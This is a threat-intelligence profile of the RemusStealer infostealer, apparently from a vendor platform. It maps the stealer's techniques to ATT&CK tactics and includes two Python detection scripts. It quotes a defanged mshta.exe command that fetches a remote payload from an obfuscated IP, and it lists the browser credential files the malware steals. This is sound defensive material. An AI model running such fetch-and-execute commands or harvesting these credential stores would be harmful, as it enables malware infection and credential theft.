RemusStealer
Techniques & procedures
20 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
2 techniques
The JavaScript loaded by these pages listens for the user's first interaction and intercepts it before normal navigation can proceed. On Chrome it captures a mousedown event; on Firefox it uses a click event. It then generates a TDS runtime URL, redirects the user silently, and cancels the original navigation entirely.
Hackers are creating convincing fake websites that impersonate popular security tools to trick users into downloading malware.
Execution
2 techniques
The page imitates a Cloudflare verification screen and instructs the user to run: C:\Windows\SysWOW64\mshta.exe https://185.0xA1.0xFB[.]58/navy.7z
The attack chain uses CloudFront-hosted JavaScript for browser fingerprinting, click tracking, and traffic routing, enabling stealthy, interaction-based redirection... The payload employs a heavily obfuscated Go loader...
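The mshta.exe lure above hides its server behind a mixed hex/decimal IP literal, which string-matching on a dotted-quad blocklist will miss. The following is an added detection example, not code from the page or from Mallory: it refangs a constructed Sysmon-style process-creation event, flags mshta.exe launched with a remote URL, and canonicalizes the host the way the Windows resolver would (hex, octal, and short-form components, including the inet_aton rule that the last component fills the remaining bytes). The sample events and the parent-process values are constructed; the dotted-quad form is computed from the page's own literal.

```python
import re
from ipaddress import IPv4Address

# Constructed Sysmon-style process-creation events (not telemetry from the page).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\SysWOW64\mshta.exe",
     "CommandLine": r"C:\Windows\SysWOW64\mshta.exe https://185.0xA1.0xFB[.]58/navy.7z",
     "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe",              # benign: local .hta from an installer
     "CommandLine": r"mshta.exe C:\Windows\System32\setup.hta",
     "ParentImage": r"C:\Windows\System32\msiexec.exe"},
]

URL_RE = re.compile(r"https?://([^/\s]+)", re.IGNORECASE)


def refang(text: str) -> str:
    """Undo common IOC defanging so the URL can be parsed."""
    return text.replace("[.]", ".").replace("hxxp", "http")


def _component(tok: str) -> int:
    """Parse one dotted component the way inet_aton does: 0x hex, leading-0 octal, else decimal."""
    if tok[:2].lower() == "0x":
        return int(tok[2:], 16)
    if len(tok) > 1 and tok.startswith("0"):
        return int(tok, 8)
    return int(tok, 10)


def normalize_ipv4(host: str):
    """Return the canonical dotted-quad for any inet_aton-style literal, or None if not numeric."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        vals = [_component(p) for p in parts]
    except ValueError:
        return None
    # With fewer than four components the final one spans the remaining bytes.
    widths = [8] * (len(parts) - 1) + [8 * (5 - len(parts))]
    addr = 0
    for v, w in zip(vals, widths):
        if v < 0 or v >= (1 << w):
            return None
        addr = (addr << w) | v
    return str(IPv4Address(addr))


def triage_event(event: dict) -> dict:
    """Flag mshta.exe executions whose command line carries a remote URL and canonicalize the host."""
    image = event.get("Image", "").lower()
    result = {"suspicious": False, "host": None, "normalized_host": None,
              "parent": event.get("ParentImage", "")}
    if not image.endswith("\\mshta.exe"):
        return result
    match = URL_RE.search(refang(event.get("CommandLine", "")))
    if match is None:
        return result
    host = match.group(1).split(":")[0]      # drop any :port
    result.update(suspicious=True, host=host, normalized_host=normalize_ipv4(host))
    return result


def triage_events(events) -> list:
    return [triage_event(e) for e in events]


if __name__ == "__main__":
    for r in triage_events(SAMPLE_EVENTS):
        print(r)
```

The normalized value is what should be compared against IP blocklists and enrichment sources; the raw literal is still worth keeping as an additional indicator, since the obfuscated spelling itself is unusual in legitimate command lines.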
Persistence
1 technique
These pages load a CloudFront-hosted JavaScript staging layer that converts a click on a "download" button/link into a handoff to a Traffic Distribution System (TDS). The TDS enforces strict gating: first-visit state, mandatory click confirmation, anti-bot/anti-analysis logic, VPN/datacenter filtering, and frequency capping.
Stealth
4 techniques
SessionGate — A previously unknown multi-stage loader with heavy obfuscation and extensive anti-analysis mechanisms... Because of the obfuscation techniques in use, including injected junk code, opaque predicates, and string encryption, the resulting functions become extremely bloated.
Check Point Research investigated a large-scale operation that impersonates open-source and freeware projects to capture search traffic, including lookalikes for researcher and security tooling such as Ghidra, dnSpy, and SpiderFoot.
These pages load a CloudFront-hosted JavaScript staging layer that converts a click on a “download” button/link into a handoff to a Traffic Distribution System (TDS). The TDS enforces strict gating: first-visit state, mandatory click confirmation, anti-bot/anti-analysis logic, VPN/datacenter filtering, and frequency capping.
The modules are not written to disk: they are loaded via in-memory PE manual mapping (often referred to as reflective / manual-map loading), and execution is transferred through exported functions.
Credential Access
4 techniques
Browser data theft: Chromium family: History, Login Data, Login Data For Account, Network\Cookies, Web Data. Firefox/NSS profiles: key4.db, cert9.db, cookies.sqlite, logins.json...
Browser data theft: Chromium family: ... Login Data ... Firefox/NSS profiles: ... logins.json ... Chromium key material: extracts the master key from Local State via DPAPI (CryptUnprotectData)
Browser data theft: Chromium family: History, Login Data, Login Data For Account, Network\Cookies, Web Data ... Firefox/NSS profiles: ... logins.json
RemusStealer is a newly emerged infostealer targeting data from more than 20 browsers, including cryptocurrency wallets, password managers, and two-factor authentication tools.
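The credential-access entries above name the exact on-disk artifacts the stealer reads, and the pairing that matters for detection: a Chromium profile's Login Data or cookie store together with Local State, which holds the DPAPI-wrapped master key needed to decrypt them. This added example (not code from the page or from Mallory) runs that analytic over constructed EDR-style file-access events: it classifies each touched path as a Chromium or Firefox credential artifact, ignores the browser's own processes, and rates a non-browser process high when it reads both the ciphertext store and Local State. The process name loader.exe, the user name, and the allowlisted browser binaries are assumptions.

```python
# Artifact names taken from the page's Chromium and Firefox/NSS lists (lowercased for matching).
CHROMIUM_ARTIFACTS = {"history", "login data", "login data for account", "web data", "local state"}
FIREFOX_ARTIFACTS = {"key4.db", "cert9.db", "cookies.sqlite", "logins.json"}

# Assumed allowlist of processes that legitimately open each family's artifacts.
CHROMIUM_PROCS = {"chrome.exe", "msedge.exe", "brave.exe", "vivaldi.exe", "chromium.exe"}
FIREFOX_PROCS = {"firefox.exe"}

# Constructed file-access events, not from any real host.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\alice\AppData\Local\Temp\loader.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"Image": r"C:\Users\alice\AppData\Local\Temp\loader.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Local State"},
    {"Image": r"C:\Users\alice\AppData\Local\Temp\loader.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies"},
    {"Image": r"C:\Users\alice\AppData\Local\Temp\loader.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\Mozilla\Firefox\Profiles\ab12cd34.default-release\logins.json"},
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",   # browser's own access: expected
     "TargetFilename": r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",            # expected
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\Mozilla\Firefox\Profiles\ab12cd34.default-release\cookies.sqlite"},
]


def _split(path: str):
    p = path.replace("/", "\\").lower()
    parent, _, name = p.rpartition("\\")
    return p, parent, name


def classify_artifact(path: str):
    """Return 'chromium', 'firefox', or None for a touched path.

    Chromium artifacts must live under a 'User Data' tree (Network\\Cookies is matched by its
    parent directory); Firefox artifacts must sit inside a 'Profiles' tree. This keeps an
    unrelated file that happens to be called 'History' from matching.
    """
    p, parent, name = _split(path)
    if "\\user data\\" in p:
        if name in CHROMIUM_ARTIFACTS or (name == "cookies" and parent.endswith("\\network")):
            return "chromium"
    if "\\profiles\\" in p and name in FIREFOX_ARTIFACTS:
        return "firefox"
    return None


def is_expected_reader(family: str, image: str) -> bool:
    proc = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return proc in (CHROMIUM_PROCS if family == "chromium" else FIREFOX_PROCS)


def detect_browser_artifact_access(events) -> list:
    """Group non-browser reads of credential artifacts per process and rate the findings."""
    hits = {}
    for ev in events:
        family = classify_artifact(ev["TargetFilename"])
        if family is None or is_expected_reader(family, ev["Image"]):
            continue
        _, _, name = _split(ev["TargetFilename"])
        hits.setdefault(ev["Image"], {"chromium": set(), "firefox": set()})[family].add(name)

    findings = []
    for image, arts in hits.items():
        chromium = arts["chromium"]
        # Local State (DPAPI-wrapped master key) plus Login Data / cookies is the pair
        # needed to decrypt Chromium secrets offline, so that combination rates high.
        high = "local state" in chromium and bool(
            chromium & {"login data", "login data for account", "cookies"})
        findings.append({"image": image, "chromium": sorted(chromium),
                         "firefox": sorted(arts["firefox"]), "high": high})
    return findings


if __name__ == "__main__":
    for f in detect_browser_artifact_access(SAMPLE_EVENTS):
        print(f)
```

In production the allowlist should be keyed on signer and full path rather than bare image name, since a stealer can simply be named chrome.exe; the artifact pairing logic is the durable part of the rule.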
Discovery
2 techniques
Registry reconnaissance: server-controlled queries of arbitrary path/value pairs, with HKCU-relative support and WOW64 view retry logic.
data contains: path, mask, depth, size, link ... Expands %ENV% paths, traverses directories with filters/limits, collects matching file contents, packages results, and uploads them to C2.
Collection
3 techniques
The agent executes tasks in a loop ... File-system search + exfiltration ... Browser data theft ... Registry reconnaissance ... Clipboard theft ... Screenshot capture
Screenshot capture: supported and exfiltrated as Screenshot.bmp when enabled by an internal flag
Clipboard theft: captures CF_UNICODETEXT, exfiltrated as Clipboard.txt ... At a high level, the final payload is a clipboard-hijacking crypto clipper: it continuously monitors the clipboard for cryptocurrency wallet strings ... replaces the copied address with one of multiple attacker-controlled wallet addresses.
Command and Control
4 techniques
...retrieves its command-and-control infrastructure through an Ethereum-based dead drop resolver...
The stealer polls the C2 using HTTP POST requests ... The malware uses HTTPS to communicate with the resolved C2 server. In the analyzed build, the observed logic includes periodic refresh check-ins
...retrieves its command-and-control infrastructure through an Ethereum-based dead drop resolver, demonstrating advanced evasion and resilient C2 techniques...
These pages load a CloudFront-hosted JavaScript staging layer that converts a click on a "download" button/link into a handoff to a Traffic Distribution System (TDS). The TDS enforces strict gating: first-visit state, mandatory click confirmation, anti-bot/anti-analysis logic, VPN/datacenter filtering, and frequency capping.
IOCs tracked for this family
39 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
3 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A newly emerged infostealer that steals data from more than 20 browsers as well as cryptocurrency wallets, password managers, and two-factor authentication tools.
A newly emerged malware-as-a-service infostealer that performs C2-driven collection of browser data, cookies, credentials, extension data, clipboard contents, screenshots, registry data, and files. It heavily targets cryptocurrency wallets, password managers, and 2FA/TOTP-related browser extensions across multiple browser ecosystems.
Credential-stealing malware delivered via fake MEGA Transfer pages after interaction-based redirection from legitimate websites. The campaign uses CloudFront-hosted JavaScript for browser fingerprinting, click tracking, and traffic routing, and the payload uses a heavily obfuscated Go loader with an Ethereum-based dead drop resolver to obtain command-and-control infrastructure for resilient credential theft and malware delivery.